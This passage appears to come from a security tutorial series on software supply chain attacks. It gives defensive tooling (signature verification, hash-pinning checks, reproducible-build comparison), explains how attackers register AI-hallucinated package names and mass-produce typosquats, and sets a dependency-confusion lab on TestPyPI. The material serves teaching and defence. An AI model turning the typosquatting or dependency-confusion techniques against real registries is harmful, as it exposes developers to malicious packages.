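--certificate-identity-regexp '^https://github.com/myorg/' \
myregistry.com/myimage:v1.0
# (cosign 2.x requires an expected signer identity for keyless
# verification; "myorg" is a placeholder for your own organization)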
# npm package provenance (available since 2023):
npm audit signatures
# Checks that packages were built by their claimed CI/CD systems
# 4. Private registry with upstream mirroring and approval
# Artifactory / Nexus / Verdaccio (npm) / devpi (Python)
#
# Policy: new packages require security review before approval
# Only reviewed packages are available to build systems
# Mirrors approved versions from upstream registries
# Blocks direct access to public registries from CI/CD
# 5. Code signing and provenance
# Sigstore (cosign) for container images:
cosign sign --key cosign.key myregistry.com/myimage:v1.0
cosign verify --key cosign.pub myregistry.com/myimage:v1.0
# 6. Dependency review on pull requests
# GitHub: Dependency Review Action
# Blocks PRs that introduce known-vulnerable dependencies
# Shows diff of dependency changes in every PR
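Defense 1 only works if every line in requirements.txt is actually pinned and hashed, and that is easy to lint. The sketch below is a simplified checker: `unpinned_requirements` is a hypothetical helper, the `sha256:PLACEHOLDER` value stands in for a real digest, and the parsing covers only plain `name==version` lines with optional backslash continuations (no URLs, extras, or environment markers).

```python
# Raw string so the trailing backslash survives as a line continuation.
SAMPLE = r"""
# demo requirements file
requests==2.31.0 \
    --hash=sha256:PLACEHOLDER
flask>=2.0
urllib3==2.0.7
"""


def unpinned_requirements(requirements_text):
    """List requirements that lack an exact '==' pin or a --hash option."""
    joined = requirements_text.replace("\\\n", " ")  # fold continuation lines
    problems = []
    for raw in joined.splitlines():
        line = raw.split(" #")[0].strip()
        if not line or line.startswith("#") or line.startswith("-"):
            continue  # blank line, comment, or a pip option such as -r
        spec = line.split()[0]
        if "==" not in spec:
            problems.append(f"{spec}: not pinned to an exact version")
        elif "--hash=" not in line:
            problems.append(f"{spec}: pinned but missing --hash")
    return problems


for problem in unpinned_requirements(SAMPLE):
    print(problem)
```

Running a check like this in CI catches the moment someone adds a loose `flask>=2.0` line, before `--require-hashes` fails the build or, worse, before someone removes that flag to make the build pass.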
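The SLSA framework is particularly important because it addresses the SolarWinds-style attack directly. At SLSA Build Level 3, builds run on a hardened platform where each build is isolated and the provenance cannot be forged by the build steps themselves, so an implant in one build job has a much harder time tampering with another job's output unnoticed. Hermetic builds (no network access during the build, so a compromised build can't download additional malicious code) and reproducible builds (building from the same source always produces bit-identical output, so a backdoor injected during the build produces a different hash than an independent rebuild) go a step further; they appeared as Level 4 requirements in the SLSA v0.1 draft. With reproducible builds, a SolarWinds-style compromise would have been detectable: rebuild from source, compare hashes, notice they don't match, investigate.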
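The "rebuild and compare hashes" step is only a few lines of code once the build itself is reproducible. A minimal sketch, where `sha256_file` and `builds_match` are hypothetical helper names and the three temporary files stand in for an official artifact, an independent rebuild, and a tampered artifact:

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path, chunk_size=65536):
    """Hash a file in chunks so large artifacts don't need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def builds_match(official_artifact, independent_rebuild):
    """True when both artifacts are bit-for-bit identical."""
    return sha256_file(official_artifact) == sha256_file(independent_rebuild)


with tempfile.TemporaryDirectory() as tmp:
    official = Path(tmp) / "official.bin"
    rebuild = Path(tmp) / "rebuild.bin"
    tampered = Path(tmp) / "tampered.bin"
    official.write_bytes(b"demo artifact\n")
    rebuild.write_bytes(b"demo artifact\n")
    tampered.write_bytes(b"demo artifact\n" + b"injected code")
    clean_result = builds_match(official, rebuild)
    tampered_result = builds_match(tampered, rebuild)

print(clean_result, tampered_result)
```

The hard part in practice is not the comparison but getting the build to be deterministic in the first place (timestamps, file ordering, and embedded paths all break bit-identical output).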
The AI Slop Connection
AI code generators have created an entirely new supply chain attack vector. When a developer asks an AI to help with a task and the AI suggests pip install obscure-package-name, how does the developer verify that package is legitimate? They probably don't. They paste the command, install the package, and move on.
Worse, AI models sometimes hallucinate package names -- they suggest packages that don't exist. Researchers have demonstrated that you can register the hallucinated package names on PyPI and npm, and real developers will install them because an AI told them to. This is dependency confusion by proxy, with the AI as the unwitting accomplice.
And on the offensive side, AI is being used to generate malicious packages at scale. An attacker can use AI to create hundreds of typosquatted packages with legitimate-looking README files, documentation, changelogs, and even test suites. The packages look real because they were generated by the same models that generate real packages. Automated quality checks (does this package have a README? does it have tests? is the description coherent?) are defeated because AI generates all of those artifacts trivially.
The supply chain was already fragile before AI. AI is making it more fragile in two ways simultaneously: increasing the volume of dependencies (AI suggests adding packages for trivial functionality that a developer would have written in 10 lines of code) and increasing the sophistication of attacks (AI-generated malicious packages that pass casual inspection and automated quality gates).
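A small habit that helps against hallucinated package names: before installing anything an AI suggested, look the name up on the registry and read the metadata. The sketch below queries PyPI's JSON endpoint (`https://pypi.org/pypi/NAME/json`) with the standard library; `pypi_metadata` and `release_count` are hypothetical helper names, and the `opener` parameter exists only so the function can be exercised without network access.

```python
import json
import urllib.error
import urllib.request


def pypi_metadata(name, opener=urllib.request.urlopen):
    """Return the PyPI JSON document for a project, or None if it doesn't exist."""
    url = f"https://pypi.org/pypi/{name}/json"
    try:
        with opener(url, timeout=10) as response:
            return json.load(response)
    except urllib.error.HTTPError as error:
        if error.code == 404:
            return None  # no such project on PyPI
        raise


def release_count(document):
    """Number of published releases listed in a PyPI JSON document."""
    return len(document.get("releases", {}))


# Example use (requires network access, so it is left commented out):
# doc = pypi_metadata("requests")
# print(release_count(doc) if doc else "package does not exist")
```

Existence alone proves nothing, since the whole attack is that someone registered the hallucinated name. A package with one release, published last week, that an AI "remembers" as a well-known library is exactly the pattern to be suspicious of.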
What Comes Next
We've now completed a massive arc of the series. From episode 1 through episode 45, we've covered the full technical spectrum: reconnaissance and scanning, web application attacks, network exploitation, privilege escalation, lateral movement, cloud and infrastructure attacks, exploitation frameworks, custom binary exploitation with modern mitigation bypasses, reverse engineering, and now supply chain attacks. These are the how of hacking -- the techniques, the tools, the methods.
The next phase of this series shifts to a fundamentally different question. The techniques we've covered so far assume a technical attack surface -- a buffer overflow, a SQL injection, a misconfigured cloud instance. But the vast majority of successful breaches don't start with a technical exploit. They start with a human making a mistake. Clicking a link. Reusing a password. Plugging in a USB drive. Trusting a phone call. The human element is not just another attack surface -- it's the attack surface that every technical defense ultimately depends on. And understanding why decades of security awareness training have failed to fix it requires looking at security through an entirely different lens than the one we've been using.
Exercises
Exercise 1: Audit the dependencies of a project you work on. Use npm audit, pip-audit, or cargo audit depending on the language. Document: (a) total number of direct dependencies, (b) total number of transitive dependencies, (c) number of known vulnerabilities found, (d) severity breakdown (critical/high/medium/low). If any critical vulnerabilities exist, trace the dependency chain to understand how the vulnerable package entered your project. Save to ~/lab-notes/dependency-audit.md.
Exercise 2: Research the XZ Utils backdoor (CVE-2024-3094) in depth. Document: (a) the social engineering timeline -- how "Jia Tan" built trust over two years, (b) the technical mechanism -- how the backdoor was hidden in the build system and release tarballs rather than the git source, (c) how it was discovered -- Andres Freund's 500ms latency observation, (d) which Linux distributions were affected and which caught it in time, (e) what supply chain defenses (SLSA provenance, reproducible builds, tarball-vs-git comparison) would have detected it earlier. Save to ~/lab-notes/xz-backdoor-analysis.md.
Exercise 3: Set up a dependency confusion lab. Create a private Python package with a unique name (e.g., mycompany-testpkg-RANDOMSTRING). Configure pip with a local directory as the primary index and TestPyPI (https://test.pypi.org/) as the extra index. Observe: does pip prefer the local version or the public version when the public version has a higher version number? Register the same package name on TestPyPI with version 99.0.0 and test again. Document pip's resolution behavior and how to configure pip to prevent this confusion. Use TestPyPI only -- do NOT publish to real PyPI. Save to ~/lab-notes/dependency-confusion-lab.md.